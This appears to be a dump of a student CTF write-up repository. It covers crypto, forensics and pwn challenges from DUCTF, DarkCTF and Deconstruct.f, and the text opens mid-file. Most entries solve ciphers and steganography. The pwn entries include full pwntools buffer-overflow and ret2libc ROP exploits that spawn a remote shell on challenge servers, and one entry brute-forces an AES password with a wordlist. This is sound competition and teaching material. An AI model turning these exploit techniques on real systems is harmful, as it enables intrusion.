3737620488571314497417090205346622993399153545806108327860889306394326129600175543006901543011761797780057015381834670602598536525041405700999041351402341132165944655025231947620944792759658373970849932332556577226700342906965939940429619291540238435218958655907376220308160747457826709661045146370045811481759205791264522144828795638865497066922857401596416747229446467493237762035398880278951440472613839314827303657990772981353235597563642315346949041540358444800649606802434227470946957679458305736479634459353072326033223392515898946323827442647800803732869832414039987483103532294736136051838693397106408367097 8 | c = 7000985606009752754441861235720582603834733127613290649448336518379922443691108836896703766316713029530466877153379023499681743990770084864966350162010821232666205770785101148479008355351759336287346355856788865821108805833681682634789677829987433936120195058542722765744907964994170091794684838166789470509159170062184723590372521926736663314174035152108646055156814533872908850156061945944033275433799625360972646646526892622394837096683592886825828549172814967424419459087181683325453243145295797505798955661717556202215878246001989162198550055315405304235478244266317677075034414773911739900576226293775140327580 9 | 10 | # From factordb 11 | 12 | p = 137526660281921131221818797107719332505145627503966517923070280130875449016216283557144366594925577458093232503891037595787957060953687166721367679274343931891139309595758625134752102980837611457006046816552168551932124923087090435785959383128842381406539452056309367997750395905747259198693037451326868517899 13 | 14 | q = 142330230705328145595283676471239195558844969347785580004001554538877181973869318257471293219512143354019499347549183531116588694914100319083003689276059546015147159203569933280678564050512749524779927522346194056170602443980796876645843108623490893506040488132906421994550401879219627124260709500352428249413 15 | 16 | 17 | 18 | print(p*q == n) 19 | 20 | phi = (p-1)*(q-1) 21 | 22 | d = 
inverse(e, phi) 23 | 24 | m = pow(c,d,n) 25 | 26 | m = hex(m)[2:] 27 | 28 | print(bytes.fromhex(m)) -------------------------------------------------------------------------------- /DUCTF/crypto/hex-cipher-shift/exploit.py: -------------------------------------------------------------------------------- 1 | ALPHABET = '0123456789abcdef' 2 | 3 | def gen_rules(ciphertext, plaintext): 4 | x = plaintext 5 | y = ciphertext[:len(plaintext)] 6 | s = 7 7 | 8 | xor_rules = [] 9 | xor_res = [] 10 | for i in range(len(plaintext)): 11 | tmp = f"k.index('{x[i]}') ^ {s} = k.index('{y[i]}')".split(' = ') 12 | xor_rules.append(tmp[0]) 13 | xor_res.append(tmp[1]) 14 | s = f"k.index('{x[i]}')" 15 | 16 | return xor_rules, xor_res 17 | 18 | def decrypt(ciphertext, key): 19 | s = 7 20 | plaintext = '' 21 | for i in range(len(ciphertext)): 22 | p = key[key.index(ciphertext[i]) ^ s] 23 | s = key.index(ciphertext[i]) ^ s 24 | plaintext += p 25 | 26 | return plaintext 27 | 28 | def rotate(l, n): 29 | return l[-n:] + l[:-n] 30 | 31 | def get_key(xor_rules, xor_res, plaintext): 32 | k = list(ALPHABET) 33 | 34 | while plaintext not in decrypt(ciphertext, k): 35 | k = rotate(k, 1) 36 | 37 | for i in range(len(xor_rules)): 38 | xorred = eval(xor_rules[i]) 39 | 40 | if xorred != eval(xor_res[i]): 41 | tmp = k[xorred] 42 | tmp_ind = eval(xor_res[i]) 43 | 44 | k[xorred] = xor_res[i][9] 45 | k[tmp_ind] = tmp 46 | return k 47 | 48 | 49 | plaintext = b'The secret message is:'.hex() 50 | 51 | ciphertext = '85677bc8302bb20f3be728f99be0002ee88bc8fdc045b80e1dd22bc8fcc0034dd809e8f77023fbc83cd02ec8fbb11cc02cdbb62837677bc8f2277eeaaaabb1188bc998087bef3bcf40683cd02eef48f44aaee805b8045453a546815639e6592c173e4994e044a9084ea4000049e1e7e9873fc90ab9e1d4437fc9836aa80423cc2198882a' 52 | 53 | xor_rules, xor_res = gen_rules(ciphertext, plaintext) 54 | 55 | k = get_key(xor_rules, xor_res, plaintext) 56 | 57 | print('[Key]\n' + ''.join(k)) 58 | msg = decrypt(ciphertext, k) 59 | print('[MESSAGE]\n' + 
bytes.fromhex(msg).decode()) 60 | 61 | -------------------------------------------------------------------------------- /DUCTF/crypto/rot-i/README.md: -------------------------------------------------------------------------------- 1 | # rot-i 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | ROT13 is boring! 9 | ``` 10 | 11 | ``` 12 | Ypw'zj zwufpp hwu txadjkcq dtbtyu kqkwxrbvu! Mbz cjzg kv IAJBO{ndldie_al_aqk_jjrnsxee}. Xzi utj gnn olkd qgq ftk ykaqe uei mbz ocrt qi ynlu, etrm mff'n wij bf wlny mjcj :). 13 | ``` 14 | 15 | ## Exploit 16 | 17 | The shift offset increments by 1. 18 | 19 | ```py 20 | text = "IAJBO{ndldie_al_aqk_jjrnsxee}" 21 | 22 | offset = ord('I') - ord('D') 23 | 24 | for i in text.lower(): 25 | if not i.isalpha(): 26 | print(i, end = '') 27 | else: 28 | print(chr((ord(i) - offset - ord('a')) % 26 + ord('a')), end = '') 29 | offset += 1 30 | ``` 31 | 32 | The flag is: 33 | 34 | ``` 35 | DUCTF{crypto_is_fun_kjqlptzy} 36 | ``` -------------------------------------------------------------------------------- /DUCTF/forensics/i-love-scomo/README.md: -------------------------------------------------------------------------------- 1 | # I Love Scomo 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | I really do love Scott Morrison! <3 <3 <3 9 | 10 | However, some people don't like me because of my secret crush :(. So I have to hide my secrets using steganography. This is my hidden space, where I can dream about being with Scomo and I really appreciate that no one tries to reveal my secret message for him. 11 | ``` 12 | 13 | ## Exploit 14 | 15 | In the challenge description, `hidden space` was in bold. This might be useful later. 16 |
17 | 18 | First, you can use `stegcrack` to extract a `txt` file out of the image. The `txt` file is present in [ilovescomo.jpg.out](./ilovescomo.jpg.out). 19 | 20 | In this, you will notice that some lines have a white space in the end, and some do not. This makes sense because `hidden space` was written in bold in the description. We assume that a white space means `1` and the absence of a white space means `0`. Then we convert the obtained binary string to ASCII to get the flag. 21 | 22 | ```py 23 | # Get ilovescomo.jpg.out using stegcrack 24 | text = open('./ilovescomo.jpg.out', 'r').read().split('\n') 25 | 26 | l = ['0'] * len(text) 27 | 28 | for i in range(len(text)): 29 | if text[i] == '': 30 | continue 31 | if text[i][-1] == ' ': 32 | l[i] = '1' 33 | 34 | print(''.join(l)) 35 | 36 | l = [chr(int(''.join(l[i:i+8]), 2)) for i in range(0, len(l), 8)] 37 | 38 | print(''.join(l)) 39 | ``` -------------------------------------------------------------------------------- /DUCTF/forensics/i-love-scomo/ilovescomo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/forensics/i-love-scomo/ilovescomo.jpg -------------------------------------------------------------------------------- /DUCTF/forensics/i-love-scomo/solve.py: -------------------------------------------------------------------------------- 1 | # Get ilovescomo.jpg.out using stegcrack 2 | text = open('./ilovescomo.jpg.out', 'r').read().split('\n') 3 | 4 | l = ['0'] * len(text) 5 | 6 | for i in range(len(text)): 7 | if text[i] == '': 8 | continue 9 | if text[i][-1] == ' ': 10 | l[i] = '1' 11 | 12 | print(''.join(l)) 13 | 14 | l = [chr(int(''.join(l[i:i+8]), 2)) for i in range(0, len(l), 8)] 15 | 16 | print(''.join(l)) -------------------------------------------------------------------------------- /DUCTF/forensics/spot-the-difference/Publish.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/forensics/spot-the-difference/Publish.zip -------------------------------------------------------------------------------- /DUCTF/forensics/spot-the-difference/README.md: -------------------------------------------------------------------------------- 1 | # Spot the Difference 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | Author: TheDon 9 | 10 | An employee's files have been captured by the first responders. The suspect has been accused of using images to leak confidential infomation, steghide has been authorised to decrypt any images for evidence! 11 | ``` 12 | 13 | ## Exploit 14 | 15 | Upon unzipping, you can see a broken png called `Publish/.config/Reminder.png`. When you check it's hexdump, you notice that the first 4 bytes of the `png` are not correct. Fix them using `hexedit Reminder.png` to make them `89 50 4E 47`. 16 | 17 | ``` 18 | 00000000 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D .PNG........ 19 | 0000000C 49 48 44 52 00 00 02 F6 00 00 00 28 IHDR.......( 20 | 00000018 08 06 00 00 00 95 4A BE 56 00 00 0F ......J.V... 21 | 00000024 94 49 44 41 54 78 01 ED 9D BB 6E E3 .IDATx....n. 22 | 00000030 3C 16 C7 8F 17 DF 43 EC F6 36 06 53 <.....C..6.S 23 | 0000003C E4 01 EC 07 58 20 C1 14 53 A5 9C 52 ....X ..S..R 24 | 00000048 E9 16 71 91 62 17 48 95 32 85 D3 C6 ..q.b.H.2... 25 | ``` 26 | 27 | Now, you can see the png. The password contains `1cmVQ`. There are a lot of base64 strings in `Public/.config/secret/`. Use grep to find the right string. 28 | 29 | ```bash 30 | $ grep -rs 1cmVQ 31 | 31/5.txt:CjEyMzRJc0FTZWN1cmVQYXNzd29yZA== 32 | ``` 33 | 34 | Decode this to find the password. 
35 | 36 | ```bash 37 | $ echo CjEyMzRJc0FTZWN1cmVQYXNzd29yZA== | base64 -d 38 | 39 | 1234IsASecurePassword 40 | ``` 41 | 42 | Now, go through all the files in `Publish/badfiles` and extract them using steghide with the obtained password. One of them will give you a file, which you can read to get the flag. 43 | 44 | ```py 45 | import os 46 | import subprocess 47 | password = '1234IsASecurePassword' 48 | 49 | x = os.listdir('./Publish/badfiles') 50 | 51 | for i in x: 52 | subprocess.call([ 53 | 'steghide', 54 | 'extract', 55 | '-sf', 56 | f'./Publish/badfiles/{i}', 57 | '-p', 58 | password, 59 | ]) 60 | 61 | print(open('./SecretMessage.txt').read()) 62 | ``` 63 | 64 | The flag is: 65 | 66 | ``` 67 | DUCTF{m0r3_th4n_M33ts_th3_ey3} 68 | ``` -------------------------------------------------------------------------------- /DUCTF/pwn/return-to-what/README.md: -------------------------------------------------------------------------------- 1 | # Return to what 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | Author: Faith 9 | 10 | This will show my friends! 11 | 12 | nc chal.duc.tf 30003 13 | ``` 14 | 15 | ## Exploit 16 | 17 | Ret2libc ROP, but you have to find the libc version online. 
(I used (libc.rip)[https://libc.rip/]) 18 | 19 | 20 | ```py 21 | from pwn import * 22 | 23 | local = False 24 | 25 | host = 'chal.duc.tf' 26 | port = 30003 27 | 28 | elf = ELF('./return-to-what') 29 | rop = ROP(elf) 30 | 31 | if local: 32 | p = elf.process() 33 | libc = ELF('/usr/lib/libc.so.6') 34 | else: 35 | p = remote(host, port) 36 | libc = ELF('./libc6_2.27-3ubuntu1_amd64.so') 37 | 38 | PUTS_PLT = elf.plt['puts'] 39 | MAIN_PLT = elf.symbols['main'] 40 | 41 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 42 | RET = rop.find_gadget(['ret'])[0] 43 | 44 | OFFSET = b'A' * (0x30 + 0x8) 45 | 46 | log.info("puts@plt: " + hex(PUTS_PLT)) 47 | log.info("main@plt: " + hex(MAIN_PLT)) 48 | log.info("POP RDI: " + hex(POP_RDI)) 49 | 50 | def get_addr(func_name): 51 | FUNC_GOT = elf.got[func_name] 52 | rop_chain = [ 53 | POP_RDI, FUNC_GOT, 54 | PUTS_PLT, 55 | MAIN_PLT, 56 | ] 57 | 58 | rop_chain = b''.join([p64(i) for i in rop_chain]) 59 | payload = OFFSET + rop_chain 60 | 61 | print(p.clean()) 62 | print(payload) 63 | 64 | p.sendline(payload) 65 | 66 | received = p.recvline().strip() 67 | leak = u64(received.ljust(8, b'\x00')) 68 | libc.address = leak - libc.symbols[func_name] 69 | 70 | return hex(leak) 71 | 72 | log.info('Leak: ' + get_addr('puts')) 73 | log.info('Libc base: ' + hex(libc.address)) 74 | 75 | BIN_SH = next(libc.search(b'/bin/sh')) 76 | SYSTEM = libc.symbols['system'] 77 | EXIT = libc.symbols['exit'] 78 | 79 | ROP_CHAIN = [ 80 | RET, 81 | POP_RDI, BIN_SH, 82 | SYSTEM, 83 | EXIT, 84 | ] 85 | 86 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 87 | 88 | payload = OFFSET + ROP_CHAIN 89 | 90 | print(p.clean()) 91 | print(payload) 92 | 93 | p.sendline(payload) 94 | 95 | p.interactive() 96 | ``` 97 | 98 | You get a shell. 
99 | 100 | ```bash 101 | [*] Switching to interactive mode 102 | $ ls 103 | flag.txt 104 | return-to-what 105 | $ cat flag.txt 106 | DUCTF{ret_pUts_ret_main_ret_where???} 107 | ``` 108 | 109 | The flag is: 110 | 111 | ``` 112 | DUCTF{ret_pUts_ret_main_ret_where???} 113 | ``` -------------------------------------------------------------------------------- /DUCTF/pwn/return-to-what/libc6_2.27-3ubuntu1_amd64.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/pwn/return-to-what/libc6_2.27-3ubuntu1_amd64.so -------------------------------------------------------------------------------- /DUCTF/pwn/return-to-what/return-to-what: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/pwn/return-to-what/return-to-what -------------------------------------------------------------------------------- /DUCTF/pwn/shellthis/README.md: -------------------------------------------------------------------------------- 1 | # Shell this! 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | Author: Faith 9 | 10 | Somebody told me that this program is vulnerable to something called remote code execution? 11 | 12 | I'm not entirely sure what that is, but could you please figure it out for me? 
13 | 14 | nc chal.duc.tf 30002 15 | ``` 16 | 17 | ## Exploit 18 | 19 | ```py 20 | from pwn import * 21 | 22 | elf = ELF('./shellthis') 23 | 24 | host = 'chal.duc.tf' 25 | port = 30002 26 | 27 | local = False 28 | 29 | if local: 30 | p = elf.process() 31 | else: 32 | p = remote(host, port) 33 | 34 | print(p.recvuntil('name: ')) 35 | p.clean() 36 | 37 | target = p64(0x4006ca) 38 | 39 | offset = b'a' * (0x30 + 0x8) 40 | 41 | payload = offset + target 42 | p.sendline(payload) 43 | 44 | print(payload) 45 | 46 | p.interactive() 47 | ``` 48 | 49 | ```bash 50 | [*] Switching to interactive mode 51 | $ ls 52 | flag.txt 53 | shellthis 54 | $ cat flag.txt 55 | DUCTF{h0w_d1d_you_c4LL_That_funCT10n?!?!?} 56 | ``` 57 | 58 | The flag is: 59 | 60 | ``` 61 | DUCTF{h0w_d1d_you_c4LL_That_funCT10n?!?!?} 62 | ``` -------------------------------------------------------------------------------- /DUCTF/pwn/shellthis/shellthis: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/pwn/shellthis/shellthis -------------------------------------------------------------------------------- /DarkCTF 2020/Crypto/E-AES/README.md: -------------------------------------------------------------------------------- 1 | # E-AES 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | 55 2b 31 46 36 34 33 55 2b 31 46 34 42 35 55 2b 31 46 33 33 46 55 2b 31 46 33 41 34 55 2b 31 46 36 41 41 55 2b 31 46 33 30 46 55 2b 31 46 34 30 45 55 2b 31 46 39 34 42 55 2b 31 46 36 41 42 55 2b 31 46 36 30 36 55 2b 31 46 35 32 41 55 2b 31 46 35 32 43 55 2b 31 46 36 41 41 55 2b 32 37 35 33 55 2b 31 46 36 30 37 55 2b 31 46 36 30 36 55 2b 31 46 33 37 34 55 2b 31 46 34 30 44 55 2b 31 46 33 34 43 55 2b 31 46 33 41 34 55 2b 31 46 33 32 41 55 2b 31 46 33 37 34 55 2b 32 36 30 30 55 2b 31 46 36 41 38 55 2b 31 46 34 45 45 55 2b 31 46 36 30 44 55 2b 32 37 30 35 55 2b 31 46 33 
43 45 55 2b 31 46 34 41 37 55 2b 31 46 36 42 39 55 2b 31 46 33 30 39 55 2b 31 46 35 32 43 55 2b 32 37 35 33 55 2b 31 46 36 42 39 55 2b 31 46 35 39 30 55 2b 31 46 39 32 33 55 2b 31 46 36 30 36 55 2b 31 46 39 32 33 55 2b 31 46 36 41 38 55 2b 32 33 32 38 55 2b 31 46 36 30 44 55 2b 31 46 36 41 41 55 2b 31 46 33 46 39 55 2b 31 46 35 37 39 55 2b 31 46 36 30 44 55 2b 31 46 33 41 34 55 2b 31 46 33 38 38 55 2b 31 46 33 34 43 55 2b 31 46 39 39 33 55 2b 32 37 35 33 55 2b 31 46 36 30 30 55 2b 32 37 35 33 55 2b 32 36 30 33 55 2b 31 46 33 43 45 55 2b 32 36 30 30 55 2b 32 36 30 32 55 2b 32 37 30 35 55 2b 31 46 36 30 31 55 2b 31 46 33 38 38 55 2b 31 46 34 45 45 55 2b 31 46 36 30 41 55 2b 32 37 31 36 55 2b 31 46 36 41 42 55 2b 32 31 33 39 9 | ``` 10 | 11 | ## Exploit 12 | 13 | The numbers are actually Unicode characters in hex. Convert them to Unicode, and you get a list of emojis. Now convert this Unicode string to base64 and you get: 14 | 15 | ``` 16 | U2FsdGVkX1/SdY61KvbsHKyLM9+cwmnSYmh313LQ9dAN9sBbzYgYIcyu+0BM5xXi 17 | ``` 18 | 19 | Since we do not know the AES key, we can have a simple shell script to bruteforce the key with `rockyou.txt`. 20 | 21 | ```sh 22 | echo "Start!" 23 | while read p; do 24 | # Emojis in base64 25 | printf "U2FsdGVkX1/SdY61KvbsHKyLM9+cwmnSYmh313LQ9dAN9sBbzYgYIcyu+0BM5xXi" | openssl enc -d -base64 -A -aes-256-cbc -md md5 -pass pass:"$p" >> logs.txt 2>>logs.txt 26 | done }! 14 | ``` 15 |

16 | desktop_wallpaper.png 17 |

18 | 19 | ## Exploit 20 | 21 | In the challenge description they mention that `his system time doesn't change`; keeping this in mind for a later stage of the exploit, we have no luck with the usual approaches, `strings desktop_wallpaper.png` or the `meta data` of the file. We could see that the image quality or the pixels of the image seem disturbed, and using `stegsolve` on the image leads to.. 22 | 23 |

24 | stegsolve 25 |

26 | 27 | The barcode seems to be a `spotify barcode`, and when we scan it, it leads to `Level of Concern by Twenty One Pilots` 28 | 29 | Now, keeping in mind that the system time does not change on Mike's computer, we fast forward to the exact timestamp of `1:16` in the song, which did not help much. Looking back at the image given, everyone who has seen the Matrix knows that Neo picks the red pill when given a choice. So we go through the `youtube` video of `Level of Concern by Twenty One Pilots` and at the exact timestamp of `1:16` in the captions we find.. 30 | 31 |

32 | flag 33 |

34 | 35 | The flag is 36 | 37 | ``` 38 | dsc{LOC-888-481-90TO} 39 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Mike/desktop_wallpaper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Mike/desktop_wallpaper.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Mike/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Mike/flag.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Mike/stegsolve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Mike/stegsolve.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/README.md: -------------------------------------------------------------------------------- 1 | # Teg Rads - Forensics 2 | 3 | Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01) 4 | 5 | Tag : Forensics , Cryptography 6 | 7 | Requirements: Binwalk 8 | 9 | --- 10 | ## Source 11 | 12 | ``` 13 | Most of the times, what you seek is deep within the user. It starts with a writer, carries on with an actor and ends with a producer. 14 | ``` 15 |

16 | fdp.pdf 17 |

18 | 19 | ## Exploit 20 | 21 | Investigating the given pdf `fdp.pdf`, in an attempt to find hidden texts in the pdf trying ctrl+a gives us 22 | 23 |

24 | ctrl+a 25 |

26 | 27 | `dsc{f0r3n51x_15_fun} dsc{n0t_h3r3_31th3r} 1 dsc{n1c3_try} 1 dsc{f00t_n0t3} would just be too obvious` 28 | and of course none of them were the flag. 29 | 30 | Running the command `strings fdp.pdf` gave us 31 |

32 | strings1 33 |

34 | 35 | which seems to be a base64-encoded string. Since the description of the challenge says `It starts with a writer, carries on with an actor and ends with a producer`, this meant that the producer is the last part of the flag 36 |

37 | part5 38 |

39 | 40 | and decoding it got us `b4nn3d}`, which looks like the last part of the flag! Diving further into the `strings` of the file we see 41 | 42 |

43 | strings2 44 |

45 | Which seems to be a URI-encoded component, and decoding it gives us 46 |

47 | part1 48 |

49 | 50 | `dsc{public_`, the first part of the flag. 51 | 52 | Scrolling down further in the `strings` output, we find the third part of the flag 53 | 54 |

55 | strings5 56 |

57 | 58 | Decoding the binary we get `0f_` 59 |

60 | part3 61 |

62 | 63 | This text in strings informs us that there are 5 parts of the flag. 64 | 65 |

66 | strings3 67 |

68 | 69 | 70 | 71 | and towards the end of the `strings` output we find this 72 | 73 |

74 | strings4 75 |

76 | 77 | which gives us the 2nd part of the flag and tells us that there is a hidden directory containing the 4th part of the flag. 78 | 79 | Decoding the 2nd part gives us `d15pl4y_` 80 | 81 |

82 | part2 83 |

84 | 85 | Running binwalk on the pdf and navigating to the hidden directory holding the 4th part of the flag, we find a text file 86 |

87 | p4.txt 88 |

89 | 90 | Decoding the 4th part of the flag as a Vigenère cipher with the key "alexa" (since alexa is the creator of the PDF) 91 |

92 | alexa 93 |

94 |

95 | part4 96 |

97 | 98 | We finally get all parts of the flag! 99 | 100 | 101 | The flag is: 102 | 103 | ``` 104 | dsc{publ1c_d15pl4y_0f_ff3ct10n_b4nn3d} 105 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/alexa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/alexa.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/ctrl+a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/ctrl+a.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/exploit.py: -------------------------------------------------------------------------------- 1 | a_binary_string = "110000 1100110 1011111" 2 | 3 | binary_values = a_binary_string.split() 4 | 5 | ascii_string = "" 6 | for binary_value in binary_values: 7 | an_integer = int(binary_value, 2) 8 | ascii_character = chr(an_integer) 9 | ascii_string += ascii_character 10 | 11 | print(ascii_string) -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/fdp.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/fdp.pdf -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/p4.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/p4.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part1.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part2.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part3.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part4.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part5.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/pdf.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/pdf.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings1.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings2.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings3.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings4.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings5.png 
-------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/README.md: -------------------------------------------------------------------------------- 1 | # The Missing Journalist - Forensics 2 | 3 | Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01) 4 | 5 | Requirements: Binwalk,exiftool 6 | 7 | --- 8 | ## Source 9 | 10 | ``` 11 | It's been a year since you've been a private investigator and you've made quite a name for yourself. You sit there thinking about all the weird cases you've managed in the last year when suddenly, a person bursts through your door saying something about her missing husband. You finally gather that her husband, a renowned journalist who was tracking down a serial killer has suddenly gone missing since last night. The hysterical wife has provided you with a picture of how he looks like. Do you take the case? 12 | ``` 13 |

14 | The missing journalist 15 |

16 | 17 | ## Exploit 18 | 19 | Running the command `strings the_journalist.gif` gave us 20 | 21 |

22 | strings 23 |

24 | 25 | As you can see, there was a hidden directory `message/`. We used binwalk to extract the hidden files from the GIF. The PDF present inside was password-protected. 26 | 27 |

28 | pdfpassprompt 29 |

30 | 31 | Running exiftool on the GIF gave us 32 |

33 | exiftool 34 |

35 | 36 | which seemed to be a base64-encoded string 37 |

38 | pdfpass 39 |

40 | 41 | Decoding it got us "`h3_w45_l45t_s33n_4t_th4_m0v135`" and voila! This was the password of the PDF, and that finally gave us.. 42 |

43 | flag 44 |

45 | 46 | The flag: 47 | 48 | ``` 49 | dsc{1_f0und_h1m_4nd_h35_my_fr13nd} 50 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/exiftool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/exiftool.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/flag.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/pdfpass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/pdfpass.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/pdfpassprompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/pdfpassprompt.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/strings.png 
